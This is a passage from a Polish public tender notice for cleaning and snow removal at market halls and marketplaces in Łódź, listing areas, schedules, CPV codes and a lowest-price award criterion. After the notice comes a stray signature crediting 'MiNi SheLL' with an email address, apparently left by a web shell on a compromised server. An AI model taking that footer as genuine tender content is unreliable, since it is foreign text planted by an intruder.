d)utrzymywanie porządku przy pojemnikach na śmieci - chlorowanie powierzchni na której ustawione są pojemniki, zimą odśnieżanie,
e)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
f)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac - sprzątanie wewnętrznych powierzchni w hali targowej  przy ul. Małej 2 o pow. wewnętrznej 620,00 m2:
a)godziny rozpoczęcia sprzątania: poniedziałek - piątek od godziny 18:00, sobota od godziny 15:00, oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie jesienno - zimowym sprzątanie uzupełniające ok. południa polegające na usunięciu błota i nieczystości z ciągów komunikacyjnych,
c) zamiatanie i mycie powierzchni płyty głównej codziennie,
d)dbanie o drożność i czystość kratek ściekowych,
e)mycie windy towarowej i jej drzwi - 2 razy w tygodniu,
f)sprzątanie korytarzy i schodów prowadzących do piwnicy 3 razy w tygodniu,
g)opróżnienie koszy, wymiana worków na nowe, wyniesienie śmieci do pojemnika na zewnątrz codziennie, 
h)mycie drzwi bocznych do hali szt. 6 (22 m2) w zależności od potrzeb, min. 1 raz w miesiącu,
i)mycie antresoli i schodów prowadzących na nią - codziennie,
j)utrzymanie w czystości wejść głównych szt. 2 -codziennie, w okresie jesienno- zimowym 2 razy dziennie,
k)mycie drzwi automatycznych + terakoty na ścianach 82 m2  w zależności od potrzeb, min. 1 raz w miesiącu,
l)dwa razy w roku mycie dachów nad sklepami 600 m2 i okien zewnętrznych 16,76 m2.

Zakres prac - teren wokół hali targowej Górniak o pow. 3458,00 m2,
a)utrzymanie czystości i porządku ze sprzątaniem po zakończeniu handlu około godziny 18:00, w soboty ok. godz. 15:00 i sprzątaniem uzupełniającym w godzinach 8:00-10:00 (polegające na sprawdzeniu stanu czystości oraz usunięciu nieprawidłowości), usługę należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce i o godzinie wskazanej przez Zamawiającego.

Zakres prac - sprzątanie wewnętrznych powierzchni w hali targowej Górniak o pow. wewnętrznej 2058,95 m2 
a)godziny rozpoczęcia sprzątania: poniedziałek - piątek od godziny 17:00, sobota od godziny 15:00, oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie jesienno - zimowym sprzątanie uzupełniające ok. południa polegające na usunięciu błota i nieczystości z ciągów komunikacyjnych,
c)antresola powierzchnia 630m2
   - zamiatanie posadzki codziennie,3 razy w tygodniu mycie posadzki i balustrad, mycie i opróżnienie koszy, wymiana worków na nowe, wyniesienie śmieci do pojemnika na  zewnątrz codziennie,
d)Klatki schodowe szt. 4 - 82 m2
- zamiatanie, mycie 3 razy w tygodniu lub w razie potrzeby, raz na kwartał mycie żaluzji,
e)Wejście do hali szt. 4 i płyta główna - 1346 m2
- zamiatanie i mycie specjalistyczną maszyną posadzki płyty głównej do stanu jednorodności powierzchni bez smug i zacieków, codziennie, zamiatanie i mycie wejść do hali  szt. 4 i schodów zewnętrznych codziennie, w okresie jesienno- zimowym 2 razy dziennie, zamiatanie i mycie bram wjazdowych szt. 2 codziennie, mycie szyb w drzwiach wejściowych i automatycznych 180 m2, min. raz w tygodniu lub w razie potrzeby,  mycie bram automatycznych 35 m2 raz w miesiącu lub w razie potrzeby, mycie, dezynfekcja i sprzątanie toalet dla najemców hali szt. 3, WC administracji, szatni i pomieszczeń gospodarczych, według potrzeb, minimum raz dziennie.  raz w tygodniu mycie glazury na ścianach w wejściach około 120 m2, 2 razy w roku mycie dachów nad pawilonami handlowymi wewnątrz hali 650 m2,usuwanie pajęczyn i kurzu ze ścian, sufitów, lamp oświetleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Inne targowiska
 Jaracza-Kilińskiego,  Pomorska-Kilińskiego, WiN,  Przędzalniana 95, pasaż handlowy ul. Ogrodowa 4, targowisko Felińskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac-  sprzątanie targowiska przy ul. Jaracza/Kilińskiego w Łodzi o pow. 480,00 m2

a)utrzymanie czystości i porządku ze sprzątaniem po  zakończeniu handlu około godziny 18:00 oraz w niedziel handlowe przed świętami po zakończeniu handlu,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac - sprzątanie targowiska przy ul.  Pomorska-Kilińskiego w Łodzi o pow. 314,00 m2

a)targowisko sprzątane 2 razy w tygodniu tzn. wtorek i sobota po zakończeniu handlu ok. godz. 17:00 oraz w niedziele handlowe przed świętami po zakończeniu handlu,
b) w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania  należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac- sprzątanie targowiska przy ul. Organizacji  WiN w Łodzi o pow. 2000,00 m2
a) targowiska sprzątane 1 razy w tygodniu we wtorek po zakończeniu handlu ok. godz. 17:00 oraz w niedziele handlowe przed świętami po zakończeniu handlu, 
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz  wywóz nadmiaru śniegu,
c) w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć  w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac -sprzątanie targowiska przy ul. Przędzalniana 95 w Łodzi o pow. 300,00 m2,

a)targowiska sprzątane 1 raz w tygodniu w piątek po zakończeniu handlu ok. godz. 17:00 oraz w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz  wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 
Zakres prac - sprzątanie pasażu handlowego przy ul. Ogrodowej 4 w Łodzi o pow. 480,00 m2,
a)targowisko sprzątane 2 razy w tygodniu po zakończeniu handlu we wtorek ok. godz. 17:00 i sobotę ok. godz. 15:00 oraz w niedziele handlowe przed świętami po zakończeniu handlu,
b)utrzymanie czystości w WC dla najemców pow. 9 m2 sprzątanie dwa razy w tygodniu,
c)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
d)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
e)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
f)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac -  sprzątanie targowiska przy ul. Felińskiego w Łodzi o pow. 2680,00 m2
a)utrzymanie czystości i porządku ze sprzątaniem bieżącym po  zakończeniu handlu około godziny 18:00 i sprzątaniem uzupełniającym w godzinach 8:00-10:00,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6.00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com